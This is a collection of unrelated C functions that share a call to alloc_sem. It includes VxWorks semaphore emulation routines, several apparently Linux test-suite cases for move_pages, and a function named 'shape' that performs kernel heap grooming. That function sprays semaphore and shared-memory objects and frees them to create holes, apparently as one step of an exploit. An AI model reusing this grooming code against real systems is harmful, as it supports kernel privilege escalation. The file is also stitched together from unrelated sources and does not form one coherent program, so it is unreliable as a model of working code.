static SEM_ID alloc_xsem(int options, int initval, int maxval) { int sobj_flags = 0, ret; struct wind_sem *sem; if (options & ~SEM_Q_PRIORITY) { errno = S_semLib_INVALID_OPTION; return (SEM_ID)0; } sem = alloc_sem(options, &xsem_ops); if (sem == NULL) { errno = S_memLib_NOT_ENOUGH_MEMORY; return (SEM_ID)0; } if (options & SEM_Q_PRIORITY) sobj_flags = SYNCOBJ_PRIO; sem->u.xsem.value = initval; sem->u.xsem.maxvalue = maxval; ret = syncobj_init(&sem->u.xsem.sobj, CLOCK_COPPERPLATE, sobj_flags, fnref_put(libvxworks, sem_finalize)); if (ret) { xnfree(sem); errno = S_memLib_NOT_ENOUGH_MEMORY; return (SEM_ID)0; } return mainheap_ref(sem, SEM_ID); }
int main(int argc, char **argv) { const char *msg; msg = parse_opts(argc, argv, NULL, NULL); if (msg != NULL) { tst_brkm(TBROK, NULL, "OPTION PARSING ERROR - %s", msg); } setup(); #if HAVE_NUMA_MOVE_PAGES unsigned int i; int lc; unsigned int from_node; unsigned int to_node; int ret; ret = get_allowed_nodes(NH_MEMS, 2, &from_node, &to_node); if (ret < 0) tst_brkm(TBROK | TERRNO, cleanup, "get_allowed_nodes: %d", ret); /* check for looping state if -i option is given */ for (lc = 0; TEST_LOOPING(lc); lc++) { void *pages[N_TEST_PAGES] = { 0 }; int nodes[N_TEST_PAGES]; int status[N_TEST_PAGES]; pid_t cpid; sem_t *sem; /* reset tst_count in case we are looping */ tst_count = 0; ret = alloc_shared_pages_on_node(pages + SHARED_PAGE, N_SHARED_PAGES, from_node); if (ret == -1) continue; ret = alloc_pages_on_node(pages + UNSHARED_PAGE, N_UNSHARED_PAGES, from_node); if (ret == -1) goto err_free_shared; for (i = 0; i < N_TEST_PAGES; i++) { nodes[i] = to_node; } sem = alloc_sem(MAX_SEMS); if (sem == NULL) { goto err_free_unshared; } /* * Fork a child process so that the shared pages are * now really shared between two processes. */ cpid = fork(); if (cpid == -1) { tst_resm(TBROK, "forking child failed"); goto err_free_sem; } else if (cpid == 0) { child(pages, sem); } /* Wait for child to setup and signal. */ if (sem_wait(&sem[SEM_CHILD_SETUP]) == -1) tst_resm(TWARN | TERRNO, "error wait semaphore"); ret = numa_move_pages(0, N_TEST_PAGES, pages, nodes, status, MPOL_MF_MOVE); if (ret == -1) { tst_resm(TFAIL | TERRNO, "move_pages unexpectedly failed"); goto err_kill_child; } if (status[SHARED_PAGE] == -EACCES) tst_resm(TPASS, "status[%d] set to expected -EACCES", SHARED_PAGE); else tst_resm(TFAIL, "status[%d] is %d", SHARED_PAGE, status[SHARED_PAGE]); err_kill_child: /* Test done. Ask child to terminate. */ if (sem_post(&sem[SEM_PARENT_TEST]) == -1) tst_resm(TWARN | TERRNO, "error post semaphore"); /* Read the status, no zombies! */ wait(NULL); err_free_sem: free_sem(sem, MAX_SEMS); err_free_unshared: free_pages(pages + UNSHARED_PAGE, N_UNSHARED_PAGES); err_free_shared: free_shared_pages(pages + SHARED_PAGE, N_SHARED_PAGES); } #else tst_resm(TCONF, "move_pages support not found."); #endif cleanup(); tst_exit(); }
int main(int argc, char **argv) { char *msg; /* message returned from parse_opts */ /* parse standard options */ msg = parse_opts(argc, argv, NULL, NULL); if (msg != NULL) { tst_brkm(TBROK, NULL, "OPTION PARSING ERROR - %s", msg); tst_exit(); } setup(); #if HAVE_NUMA_MOVE_PAGES unsigned int i; int lc; /* loop counter */ unsigned int from_node; unsigned int to_node; int ret; ret = get_allowed_nodes(NH_MEMS, 2, &from_node, &to_node); if (ret < 0) tst_brkm(TBROK|TERRNO, cleanup, "get_allowed_nodes: %d", ret); /* check for looping state if -i option is given */ for (lc = 0; TEST_LOOPING(lc); lc++) { void *pages[TEST_PAGES] = { 0 }; int nodes[TEST_PAGES]; int status[TEST_PAGES]; pid_t cpid; sem_t *sem; /* reset Tst_count in case we are looping */ Tst_count = 0; ret = alloc_shared_pages_on_node(pages, TEST_PAGES, from_node); if (ret == -1) continue; for (i = 0; i < TEST_PAGES; i++) { nodes[i] = to_node; } sem = alloc_sem(MAX_SEMS); if (sem == NULL) { goto err_free_pages; } /* * Fork a child process so that the shared pages are * now really shared between two processes. */ cpid = fork(); if (cpid == -1) { tst_resm(TBROK, "forking child failed: %s", strerror(errno)); goto err_free_sem; } else if (cpid == 0) { child(pages, sem); } /* Wait for child to setup and signal. */ if (sem_wait(&sem[SEM_CHILD_SETUP]) == -1) tst_resm(TWARN, "error wait semaphore: %s", strerror(errno)); ret = numa_move_pages(0, TEST_PAGES, pages, nodes, status, MPOL_MF_MOVE_ALL); TEST_ERRNO = errno; if (ret == -1 && errno == EPERM) tst_resm(TPASS, "move_pages failed with " "EPERM as expected"); else tst_resm(TFAIL, "move_pages did not fail " "with EPERM"); /* Test done. Ask child to terminate. */ if (sem_post(&sem[SEM_PARENT_TEST]) == -1) tst_resm(TWARN, "error post semaphore: %s", strerror(errno)); /* Read the status, no zombies! */ wait(NULL); err_free_sem: free_sem(sem, MAX_SEMS); err_free_pages: free_shared_pages(pages, TEST_PAGES); } #else tst_resm(TCONF, "move_pages support not found."); #endif cleanup(); tst_exit(); }
int shape(size_t *spray_size) { size_t keys[0x400]; int exec[2]; int sv[2]; char flag; size_t bytes = 0, tofree = 0; size_t factor,hole_size; struct flock fl; memset(&fl, 0, sizeof(fl)); pid_t pid, wpid; int status; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) { printf("[*err] socketpair failed\n"); return 1; } bytes = spray(1); if (bytes == (size_t)-1) { printf("[*err*] bytes < 0, are you root?\n"); return 1; } *spray_size = bytes; hole_size = get_size_factor(*spray_size, &factor); tofree = hole_size / (bytes / 1) + 1; printf("[*] allocate holes before the workspace\n"); for (int i = 0; i < 0x400; ++i) { keys[i] = alloc_sem(0x7000); } for (int i = 0; i < 0x20; ++i) { alloc_sem(0x7000); } for (int i = 0; i < 0x2000; ++i) { alloc_sem(4063); } for (int i = 0; i < 0x2000; ++i) { alloc_sem(3); } pid = fork(); if (pid > 0) { printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n"); bytes = spray(5); write(sv[1], "p", 1); read(sv[1], &flag, 1); } else { // son read(sv[0], &flag, 1); printf("[*] alloc workspace pages\n"); bytes = spray(tofree); printf("[*] finish allocate workspace allocations\n"); write(sv[0], "p", 1); } if (pid > 0) { printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n"); for (int i = 0; i < 0x100; ++i) { alloc_sem(4061); for (int j = 0; j < 0x5; ++j) { alloc_shm(i * 0x100 + j); } } write(sv[1], "p", 1); } else { read(sv[0], &flag, 1); printf("[*] free middle allocation, creating workspace freed\n"); exit(1); } while ((wpid = wait(&status)) > 0); printf("[*] free prepared holes, create little pages holes before the workspace\n"); for (int i = 0; i < 0x400; ++i) { free_sem(keys[i]); } return 0; }
int main(int argc, char **argv) { tst_parse_opts(argc, argv, NULL, NULL); setup(); #ifdef HAVE_NUMA_V2 unsigned int i; int lc; unsigned int from_node; unsigned int to_node; int ret; ret = get_allowed_nodes(NH_MEMS, 2, &from_node, &to_node); if (ret < 0) tst_brkm(TBROK | TERRNO, cleanup, "get_allowed_nodes: %d", ret); /* check for looping state if -i option is given */ for (lc = 0; TEST_LOOPING(lc); lc++) { void *pages[TEST_PAGES] = { 0 }; int nodes[TEST_PAGES]; int status[TEST_PAGES]; pid_t cpid; sem_t *sem; /* reset tst_count in case we are looping */ tst_count = 0; ret = alloc_shared_pages_on_node(pages, TEST_PAGES, from_node); if (ret == -1) continue; for (i = 0; i < TEST_PAGES; i++) { nodes[i] = to_node; } sem = alloc_sem(MAX_SEMS); if (sem == NULL) { goto err_free_pages; } /* * Fork a child process so that the shared pages are * now really shared between two processes. */ cpid = fork(); if (cpid == -1) { tst_resm(TBROK | TERRNO, "forking child failed"); goto err_free_sem; } else if (cpid == 0) { child(pages, sem); } /* Wait for child to setup and signal. */ if (sem_wait(&sem[SEM_CHILD_SETUP]) == -1) tst_resm(TWARN | TERRNO, "error wait semaphore"); ret = numa_move_pages(0, TEST_PAGES, pages, nodes, status, MPOL_MF_MOVE_ALL); if (ret < 0) { tst_resm(TFAIL|TERRNO, "move_pages failed"); goto err_kill_child; } else if (ret > 0) { tst_resm(TINFO, "move_pages() returned %d\n", ret); } verify_pages_on_node(pages, status, TEST_PAGES, to_node); err_kill_child: /* Test done. Ask child to terminate. */ if (sem_post(&sem[SEM_PARENT_TEST]) == -1) tst_resm(TWARN | TERRNO, "error post semaphore"); /* Read the status, no zombies! */ wait(NULL); err_free_sem: free_sem(sem, MAX_SEMS); err_free_pages: free_shared_pages(pages, TEST_PAGES); } #else tst_resm(TCONF, NUMA_ERROR_MSG); #endif cleanup(); tst_exit(); }
SEM_ID semMCreate(int options) { pthread_mutexattr_t mattr; struct wind_sem *sem; struct service svc; if (options & ~(SEM_Q_PRIORITY|SEM_DELETE_SAFE|SEM_INVERSION_SAFE)) { errno = S_semLib_INVALID_OPTION; return (SEM_ID)0; } if ((options & SEM_Q_PRIORITY) == 0) { if (options & SEM_INVERSION_SAFE) { errno = S_semLib_INVALID_QUEUE_TYPE; /* C'mon... */ return (SEM_ID)0; } } CANCEL_DEFER(svc); sem = alloc_sem(options, &msem_ops); if (sem == NULL) { errno = S_memLib_NOT_ENOUGH_MEMORY; CANCEL_RESTORE(svc); return (SEM_ID)0; } /* * XXX: POSIX-wise, we have a few issues with emulating * VxWorks semaphores of the mutex kind. * * VxWorks flushes any kind of semaphore upon deletion * (however, explicit semFlush() is not allowed on the mutex * kind though); but POSIX doesn't implement such mechanism on * its mutex object. At the same time, we need priority * inheritance when SEM_INVERSION_SAFE is passed, so we can't * emulate VxWorks mutex semaphores using condvars. Since the * only way to get priority inheritance is to use a POSIX * mutex, we choose not to emulate flushing in semDelete(), * but keep inversion-safe locking possible. * * The same way, we don't support FIFO ordering for mutexes, * since this would require to handle them as recursive binary * semaphores with ownership, for no obvious upside. * Logically speaking, relying on recursion without any * consideration for priority while serializing threads is * just asking for troubles anyway. */ pthread_mutexattr_init(&mattr); pthread_mutexattr_settype(&mattr, PTHREAD_MUTEX_RECURSIVE); /* pthread_mutexattr_setrobust_np() might not be implemented. */ pthread_mutexattr_setrobust_np(&mattr, PTHREAD_MUTEX_ROBUST_NP); if (options & SEM_INVERSION_SAFE) pthread_mutexattr_setprotocol(&mattr, PTHREAD_PRIO_INHERIT); pthread_mutexattr_setpshared(&mattr, mutex_scope_attribute); __RT(pthread_mutex_init(&sem->u.msem.lock, &mattr)); pthread_mutexattr_destroy(&mattr); CANCEL_RESTORE(svc); return mainheap_ref(sem, SEM_ID); }